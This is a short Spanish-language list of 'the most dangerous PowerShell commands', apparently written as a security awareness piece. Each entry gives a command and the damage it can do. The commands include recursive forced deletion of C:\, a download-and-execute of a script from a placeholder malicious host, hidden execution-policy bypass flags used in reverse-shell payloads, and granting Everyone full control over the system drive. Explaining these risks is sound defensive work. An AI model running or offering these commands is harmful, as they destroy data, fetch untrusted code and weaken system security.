Los comandos más peligrosos de PowerShell

01 — Eliminación masiva de archivos
Remove-Item C:\ -Recurse -Force
Borra archivos y carpetas de forma recursiva. Ejecutarlo sobre rutas críticas puede inutilizar el sistema.
02 — Fork Bomb en PowerShell
function bomb { bomb }; bomb
Crea llamadas recursivas infinitas hasta agotar CPU y memoria, provocando un DoS local.
03 — Descarga y ejecución remota
Invoke-WebRequest "http://malicious.site/payload.ps1" -OutFile payload.ps1; .\payload.ps1
Descarga y ejecuta código remoto sin verificar su contenido. Muy usado en malware y phishing.
04 — Ejecución elevada
Start-Process powershell -Verb runAs
Lanza PowerShell con privilegios de administrador. Puede facilitar escalada de privilegios.
05 — Reverse Shell
powershell -NoP -NonI -W Hidden -Exec Bypass
Muy utilizado en payloads para conexiones remotas ocultas y control del sistema comprometido.
06 — Permisos inseguros
icacls C:\ /grant Everyone:F /T
Otorga control total a todos los usuarios sobre archivos y carpetas del sistema.
07 — Ejecución dinámica de código
Invoke-Expression $malicious_code
Ejecuta contenido almacenado en variables o cadenas. Frecuente en scripts maliciosos y evasión.